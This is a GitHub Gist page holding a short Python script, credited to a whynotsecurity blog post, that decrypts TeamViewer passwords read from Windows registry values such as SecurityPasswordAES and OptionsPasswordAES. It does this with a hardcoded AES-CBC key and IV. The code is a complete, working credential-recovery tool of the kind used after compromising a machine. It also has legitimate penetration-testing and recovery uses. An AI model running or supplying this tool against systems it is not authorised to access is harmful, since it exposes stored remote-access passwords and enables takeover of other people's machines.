Forked from rishdang/teamviewer_password_decrypt.py
Created
September 3, 2021 11:12
-
-
Save F-Masood/e3e0f3217275071ce73eb0e818f4c83b to your computer and use it in GitHub Desktop.
This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys, hexdump, binascii | |
from Crypto.Cipher import AES | |
class AESCipher: | |
def __init__(self, key): | |
self.key = key | |
def decrypt(self, iv, data): | |
self.cipher = AES.new(self.key, AES.MODE_CBC, iv) | |
return self.cipher.decrypt(data) | |
print(''' | |
This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity. | |
Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer | |
Please check below mentioned registry values and enter its value manually without spaces. | |
"SecurityPasswordAES" OR "OptionsPasswordAES" OR "SecurityPasswordExported" OR "PermanentPassword" | |
''') | |
hex_str_cipher = input("Enter output from registry without spaces : ") | |
key = binascii.unhexlify("0602000000a400005253413100040000") | |
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704") | |
ciphertext = binascii.unhexlify(hex_str_cipher) | |
raw_un = AESCipher(key).decrypt(iv, ciphertext) | |
password = raw_un.decode('utf-16') | |
print("Decrypted password is : ",password) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment